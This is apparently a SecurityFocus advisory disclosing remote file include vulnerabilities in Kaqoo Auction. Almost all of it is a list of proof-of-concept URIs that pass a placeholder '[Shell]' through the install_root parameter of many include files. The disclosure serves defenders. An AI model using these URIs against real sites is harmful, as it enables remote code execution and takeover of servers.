Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/include/core/support.inc.php?install_root=[Shell]
http://www.example.com/include/core/function.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_object.inc.php?install_root=[Shell]
http://www.example.com/include/core/rdal_editor.inc.php?install_root=[Shell]
http://www.example.com/include/core/login.inc.php?install_root=[Shell]
http://www.example.com/include/core/request.inc.php?install_root=[Shell]
http://www.example.com/include/core/categories.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/save.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/preview.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/edit_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/new_item.inc.php?install_root=[Shell]
http://www.example.com/include/display/item/item_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/search.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_edit.inc.php?install_root=[Shell]
http://www.example.com/include/display/register_succsess.inc.php?install_root=[Shell]
http://www.example.com/include/display/context_menu.inc.php?install_root=[Shell]
http://www.example.com/include/display/item_repost.inc.php?install_root=[Shell]
http://www.example.com/include/display/balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/featured.inc.php?install_root=[Shell]
http://www.example.com/include/display/user.inc.php?install_root=[Shell]
http://www.example.com/include/display/buynow.inc.php?install_root=[Shell]
http://www.example.com/include/display/install_complete.inc.php?install_root=[Shell]
http://www.example.com/include/display/fees_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_feedback.inc.php?install_root=[Shell]
http://www.example.com/include/display/admin_balance.inc.php?install_root=[Shell]
http://www.example.com/include/display/activate.inc.php?install_root=[Shell]
http://www.example.com/include/display/user_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/member.inc.php?install_root=[Shell]
http://www.example.com/include/display/add_bid.inc.php?install_root=[Shell]
http://www.example.com/include/display/items_filter.inc.php?install_root=[Shell]
http://www.example.com/include/display/my_info.inc.php?install_root=[Shell]
http://www.example.com/include/display/register.inc.php?install_root=[Shell]
http://www.example.com/include/display/leave_feedback.inc.php?install_root=[Shell]


 

Privacy Statement
Copyright 2010, SecurityFocus